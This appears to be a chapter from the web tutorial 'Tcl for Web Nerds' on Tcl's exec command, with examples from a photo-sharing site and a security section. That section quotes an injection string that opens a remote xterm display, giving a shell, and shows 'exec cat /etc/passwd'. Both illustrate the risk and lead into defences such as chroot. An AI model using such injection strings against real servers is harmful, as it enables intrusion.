
<html>
<head>
<title>Exec</title>
<LINK REL=STYLESHEET HREF="tcl_manual.css" TYPE="text/css">
</head>
<body bgcolor=white text=black>

<h2>Exec</h2>

part of <a href="index.adp">Tcl for Web Nerds</a> 
by 
<a href="http://www-swiss.ai.mit.edu/~hal/hal.html">Hal Abelson</a>,
<a href="http://philip.greenspun.com/">Philip Greenspun</a>,
and
<a href="http://sandon.org/l/">Lydia Sandon</a>


<hr>


You can invoke other Unix programs from within a Tcl script.  For a
Web developer this is either a tremendous convenience or a dangerous
security hole.

<p>

Let's cover the convenience part first.  If we want to have a Web page
that displays how long the server has been up and the current load
average, the <code>exec</code> command is helpful:

<blockquote>
<code><pre>
% exec /usr/bin/uptime
  4:04pm  up 29 days,  4:32,  3 users,  load average: 0.61, 0.66, 0.63
</pre></code>
</blockquote>


To make an AOLserver Tcl page that returns this output, you need only
wrap the <code>exec</code> in an API call:

<blockquote>
<code><pre>
ns_return 200 text/plain [exec /usr/bin/uptime]
</pre></code>
</blockquote>


The photo sharing system at http://photo.net/photodb/ stores
user-uploaded content in the Unix file system and hence makes
extensive use of Unix commands to create directories, build thumnails
of uploaded images, etc.  Here are some examples of how the photodb
system uses <code>exec</code>:

<blockquote>
<code><pre>
# see how much disk space a user is consuming
set disk_usage [exec du -k $data_path]

# find out how large an uploaded image is (X-Y pixel size)
# by invoking the ImageMagick command "identify"
set identify_str [exec /usr/local/bin/identify -verbose $filename]
regexp {geometry: ([0-9]*)x([0-9]*)} $identify_str match image_x image_y

# create a thumbnail-sized image using the ImageMagick command "convert"
set result_status [exec /usr/local/bin/convert $filename -geometry $size_sm -quality 75 $filename_sm]

# remove a directory of user-uploaded images
if [catch { exec rm -f $path } errmsg] ...
</pre></code>
</blockquote>


<h3>The Dangerous Part</h3>

Scripting languages like Perl or Tcl are convenient for Web
development but it is possible to write a script that takes
user-supplied input and evaluates it.  With Tcl, you run the risk that
a user will upload a string containing "[exec /usr/openwin/bin/xterm
-display 18.30.0.1]".  Because of the [] characters, if this string is
ever fed to <code>eval</code> or <code>subst</code> a cracker would
have a shell on your Web server.

<p>

If you don't need to use <code>exec</code> an easy solution to the
problem is to redefine it:

<blockquote>
<code><pre>
% proc exec args { return "happy happy joy joy" }
% exec cat /etc/passwd
happy happy joy joy
</pre></code>
</blockquote>


<p>

If you do need to use <code>exec</code>, at least make sure that your
Web server is running as an unprivileged user with limited authority
to execute Unix programs.  Depending on your publishing requirements
and choice of Web server, it may be possible to run the Web server in
a chroot() environment (this is very easy with AOLserver 3.0).  This
changes the root directory as far as the Web server is concerned.
Thus a Tcl program running within the Web server will not be able to
even look at files or programs elsewhere on the computer.

<p>

If you decide to run chrooted, you will have to copy any programs that
you actually do need to exec so that they are underneath the Web
server's root directory.


<br>
<br>

More:  <a href="http://www.scriptics.com/man/tcl7.5/TclCmd/exec.n.html">http://www.scriptics.com/man/tcl7.5/TclCmd/exec.n.html</a>

<br>
<br>

This is the last of the main Tcl topics.  For more information, check
out <A HREF="http://www.aolserver.com">aolserver.com</A> and the books
referenced in this book.  


<hr>
Return to <a href="index.adp">Table of Contents</a>
<br>
<br>
<address><a href="mailto:lsandon@alum.mit.edu">lsandon@alum.mit.edu</a></address>

<center><a href="/comments/add?page_id=4727">Add a comment</a> | <a href="/links/add?page_id=4727">Add a link</a></center>

</body>
</html>

